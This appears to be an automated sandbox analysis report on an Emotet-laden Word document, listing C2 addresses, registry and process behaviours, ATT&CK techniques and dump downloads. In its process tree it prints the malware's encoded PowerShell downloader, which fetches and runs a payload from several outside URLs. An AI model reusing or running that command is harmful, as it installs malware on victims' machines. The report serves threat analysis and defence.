51de13d18a23740342f1c681de4cb6c2baf116f2a4df4730c5338439d05823e4

General

Target

Docs_34df7390e3fba4cc8b8de327c79c3741.html
Sample

191010-4rly58v2mj
SHA256

51de13d18a23740342f1c681de4cb6c2baf116f2a4df4730c5338439d05823e4

Score

N/A

Malware Config

Extracted

Family

emotet

C2

http://201.184.105.242:443/

http://24.45.195.162:7080/

http://24.45.195.162:8443/

http://94.192.225.46/

http://80.11.163.139:443/

http://133.167.80.63:7080/

http://198.199.114.69:8080/

http://80.79.23.144:443/

http://192.254.173.31:8080/

http://67.225.229.55:8080/

http://190.108.228.48:990/

http://62.75.187.192:8080/

http://185.94.252.13:443/

http://94.205.247.10/

http://211.63.71.72:8080/

http://59.103.164.174/

http://192.81.213.192:8080/

http://27.4.80.183:443/

http://190.145.67.134:8090/

http://115.78.95.230:443/

Signatures

Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx

Drops Office document 4 IoCs

Processes:

WINWORD.EXE

at	description	ioc	process
6797	File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm	WINWORD.EXE
6875	File created	C:\Users\Admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	WINWORD.EXE
8407	File opened for modification	C:\Users\Admin\AppData\Local\Temp\Docs_34df7390e3fba4cc8b8de327c79c3741.html.doc	WINWORD.EXE
9000	File created	C:\Users\Admin\AppData\Local\Temp\~$cs_34df7390e3fba4cc8b8de327c79c3741.html.doc	WINWORD.EXE

Checks system information in the registry (likely anti-VM) 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

at	description	ioc	process
8344	Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	WINWORD.EXE
8344	Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	WINWORD.EXE

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

at	description	ioc	process
8360	Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
8360	Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
8360	Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
8360	Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
8360	Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Checks processor information in registry (likely anti-VM) 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

at	description	ioc	process
8360	Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
8360	Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

SppExtComObj.exepowershell.exe320.exetabletmspterm.exe

at	description	process	target process
10797	PID 3984 wrote to memory of 3960	SppExtComObj.exe	SLUI.exe
26938	PID 3548 wrote to memory of 3188	powershell.exe	320.exe
29578	PID 3188 wrote to memory of 3260	320.exe	320.exe
41110	PID 3076 wrote to memory of 2156	tabletmspterm.exe	tabletmspterm.exe

Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

at description process

19516 Token: SeDebugPrivilege powershell.exe
Suspicious behavior: EnumeratesProcesses

at	description	process
19516	Token: SeDebugPrivilege	powershell.exe

Modifies registry class 1 TTPs 84 IoCs

persistence

Modify Registry

T1112

Processes:

320.exe320.exetabletmspterm.exe

at	description	ioc	process
27188	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1	320.exe
27188	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\ = "Recalc Document"	320.exe
27188	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\DefaultIcon	320.exe
27188	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\DefaultIcon\ = "C:\\Users\\Admin\\320.exe,1"	320.exe
27188	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\ddeexec	320.exe
27188	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell	320.exe
27188	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open	320.exe
27188	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\ddeexec\ = "[open(\"%1\")]"	320.exe
27188	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\ddeexec	320.exe
27188	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print	320.exe
27188	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\ddeexec\ = "[print(\"%1\")]"	320.exe
27188	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\ddeexec	320.exe
27188	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto	320.exe
27188	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\ddeexec\ = "[printto(\"%1\",\"%2\",\"%3\",\"%4\")]"	320.exe
27188	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\command	320.exe
27188	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\command\ = "C:\\Users\\Admin\\320.exe /dde"	320.exe
27188	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\command	320.exe
27188	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\command\ = "C:\\Users\\Admin\\320.exe /dde"	320.exe
27188	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\command	320.exe
27188	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\command\ = "C:\\Users\\Admin\\320.exe /dde"	320.exe
27188	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL	320.exe
27188	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ = "Recalc.Document.1"	320.exe
27188	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ShellNew	320.exe
27188	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ShellNew\NullFile	320.exe
29672	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1	320.exe
29672	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\ = "Recalc Document"	320.exe
29672	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\DefaultIcon	320.exe
29672	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\DefaultIcon\ = "C:\\Users\\Admin\\320.exe,1"	320.exe
29672	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\ddeexec	320.exe
29672	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\ddeexec\ = "[open(\"%1\")]"	320.exe
29672	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\ddeexec	320.exe
29672	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\ddeexec\ = "[print(\"%1\")]"	320.exe
29672	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\ddeexec	320.exe
29672	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\ddeexec\ = "[printto(\"%1\",\"%2\",\"%3\",\"%4\")]"	320.exe
29688	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\command	320.exe
29688	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\command\ = "C:\\Users\\Admin\\320.exe /dde"	320.exe
29688	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\command	320.exe
29688	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\command\ = "C:\\Users\\Admin\\320.exe /dde"	320.exe
29688	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\command	320.exe
29688	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\command\ = "C:\\Users\\Admin\\320.exe /dde"	320.exe
29688	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL	320.exe
29688	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ = "Recalc.Document.1"	320.exe
29688	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ShellNew	320.exe
29688	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ShellNew\NullFile	320.exe
39313	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1	tabletmspterm.exe
39313	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\ = "Recalc Document"	tabletmspterm.exe
39313	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\DefaultIcon	tabletmspterm.exe
39313	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\DefaultIcon\ = "C:\\Windows\\SysWOW64\\TABLET~1.EXE,1"	tabletmspterm.exe
39313	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\ddeexec	tabletmspterm.exe
39313	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\ddeexec\ = "[open(\"%1\")]"	tabletmspterm.exe
39313	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\ddeexec	tabletmspterm.exe
39313	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\ddeexec\ = "[print(\"%1\")]"	tabletmspterm.exe
39313	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\ddeexec	tabletmspterm.exe
39313	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\ddeexec\ = "[printto(\"%1\",\"%2\",\"%3\",\"%4\")]"	tabletmspterm.exe
39313	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\command	tabletmspterm.exe
39313	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\command\ = "C:\\Windows\\SysWOW64\\TABLET~1.EXE /dde"	tabletmspterm.exe
39313	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\command	tabletmspterm.exe
39313	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\command\ = "C:\\Windows\\SysWOW64\\TABLET~1.EXE /dde"	tabletmspterm.exe
39313	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\command	tabletmspterm.exe
39313	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\command\ = "C:\\Windows\\SysWOW64\\TABLET~1.EXE /dde"	tabletmspterm.exe
39313	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL	tabletmspterm.exe
39313	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ = "Recalc.Document.1"	tabletmspterm.exe
39313	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ShellNew	tabletmspterm.exe
39313	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ShellNew\NullFile	tabletmspterm.exe

Emotet Sync 1 IoCs
trojan banker

Processes:

320.exe

description ioc process

Event created Global\E145925EC 320.exe
Suspicious behavior: EmotetMutantsSpam

description	ioc	process
Event created	Global\E145925EC	320.exe

Drops file in system dir 6 IoCs

Processes:

320.exetabletmspterm.exe

at	description	ioc	process
38657	File renamed	C:\Users\Admin\320.exe => C:\Windows\SysWOW64\tabletmspterm.exe	320.exe
58297	File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	tabletmspterm.exe
58422	File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	tabletmspterm.exe
58422	File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	tabletmspterm.exe
58422	File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	tabletmspterm.exe
58422	File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	tabletmspterm.exe

emotet family
family

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_34df7390e3fba4cc8b8de327c79c3741.html.doc" /o ""
1⤵
- Drops Office document
- Checks system information in the registry (likely anti-VM)
- Enumerates system info in registry
- Checks processor information in registry (likely anti-VM)
PID:3464

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:3984

C:\Windows\System32\SLUI.exe
"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
1⤵
PID:3960

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABjADcAOABjADIAOQA3ADcAYwB4ADMAMAA9ACcAeAA4ADIAMAAwADQANAA1ADQANwAxADEANwAnADsAJABjADkAOQAwAGMAOQAwADkAMgA1ADkANwAgAD0AIAAnADMAMgAwACcAOwAkAGMANgA1ADEAOQA5ADQANQA0ADAAMAA9ACcAYwA2ADIANQBjADkANwBjADAAMABjAGIAJwA7ACQAeAA3ADgAYwB4ADkANQAyAGIAOAA4AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABjADkAOQAwAGMAOQAwADkAMgA1ADkANwArACcALgBlAHgAZQAnADsAJAB4ADAAeABjADIAMAB4AGIAMAAzAHgAPQAnAHgAMAA1AHgANAAxADAAOQBiADAAOQAnADsAJABjADEAMwA0ADUANAB4ADgAYwB4AHgANAAzAD0ALgAoACcAbgBlAHcAJwArACcALQBvAGIAagBlACcAKwAnAGMAdAAnACkAIABuAEUAVAAuAHcARQBiAGMAbABpAEUATgB0ADsAJABiADAAMABjADYAYwAxADgANwA5ADkANgA9ACcAaAB0AHQAcAA6AC8ALwBlAHIAYQBrAG8AbgBsAGEAdwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFEAaQBtAGEAeQBKAHUATQBZAC8AQABoAHQAdABwADoALwAvAGMAYQByAGUAZQByAHAAbAB1AHMAcwBhAHQAbgBhAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBZAG4ASwBjAGMAbgBoAFoASwAvAEAAaAB0AHQAcAA6AC8ALwByAGEAbQBlAHMAaAB6AGEAdwBhAHIALgBjAG8AbQAvADMAbABqAGoANgAvAHcAUQBzAHQAdgBlAE0AQQBHAG0ALwBAAGgAdAB0AHAAOgAvAC8AcABsAGEAbgBlAHQAbABhAG4AYwBlAHIALgBjAG8AbQAvAGgAOAByAGcAZQAvAGsAaQBtADYANgBfAGEAZQBxAG4AYQA4ADAALQAyADAAOAA1AC8AQABoAHQAdABwADoALwAvAHAAcgBhAGQAbwBwAHIAbwAuAHIAdQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBhAGIAcABpAFYARQBvAGYALwAnAC4AIgBzAFAAYABMAGkAdAAiACgAJwBAACcAKQA7ACQAeAAwAGMAOQAzAGIAMwA2ADQANgAzADcAPQAnAGIAOAA5ADAANABiADQAMwAyADMAMAA5ACcAOwBmAG8AcgBlAGEAYwBoACgAJAB4ADMAOQAwADcAMgAwAGIAYwBjADYAMwAwACAAaQBuACAAJABiADAAMABjADYAYwAxADgANwA5ADkANgApAHsAdAByAHkAewAkAGMAMQAzADQANQA0AHgAOABjAHgAeAA0ADMALgAiAEQAYABvAFcAbgBsAE8AYQBkAEYAYABJAGwARQAiACgAJAB4ADMAOQAwADcAMgAwAGIAYwBjADYAMwAwACwAIAAkAHgANwA4AGMAeAA5ADUAMgBiADgAOAApADsAJABiADAAMAAyADAAOAA4AGIAMABiAHgAMAA9ACcAYwAzAGIANAA5ADAANAB4ADQAeAAzADMAYwAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAHgANwA4AGMAeAA5ADUAMgBiADgAOAApAC4AIgBsAGUAYABOAEcAdABIACIAIAAtAGcAZQAgADMANgAzADMAMgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYQBgAFIAdAAiACgAJAB4ADcAOABjAHgAOQA1ADIAYgA4ADgAKQA7ACQAYwA3ADEAMAB4ADUANgB4ADAAeAA5ADQAOQA9ACcAYgAzADgANgAwADEAMwB4AHgAeAA1ADYAMAAnADsAYgByAGUAYQBrADsAJABiADAANQBjAGIANAA5ADAAOQAzADAAYgA9ACcAeAB4ADMAOQBiADAAMAA2ADIAOAA3ADcAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAYwA3ADAANgBiADQANwAwADAANwA2AD0AJwBiADAAYwBjAGMAMAA0ADAAeABjADAAMAAxACcA
1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
PID:3548

C:\Users\Admin\320.exe
"C:\Users\Admin\320.exe"
1⤵
- Suspicious use of WriteProcessMemory
- Modifies registry class
PID:3188

C:\Users\Admin\320.exe
--c73fdd8f
1⤵
- Modifies registry class
- Emotet Sync
- Drops file in system dir
PID:3260

C:\Windows\SysWOW64\tabletmspterm.exe
"C:\Windows\SysWOW64\tabletmspterm.exe"
1⤵
- Suspicious use of WriteProcessMemory
- Modifies registry class
PID:3076

C:\Windows\SysWOW64\tabletmspterm.exe
--356fff06
1⤵
- Drops file in system dir
PID:2156

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

3

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2156-10-0x0000000000400000-0x0000000000490000-memory.dmp

Filesize
576KB

Download
memory/3260-6-0x0000000003C80000-0x0000000003C94000-memory.dmp

Filesize
80KB

Download
memory/3260-7-0x0000000000400000-0x0000000000490000-memory.dmp

Filesize
576KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads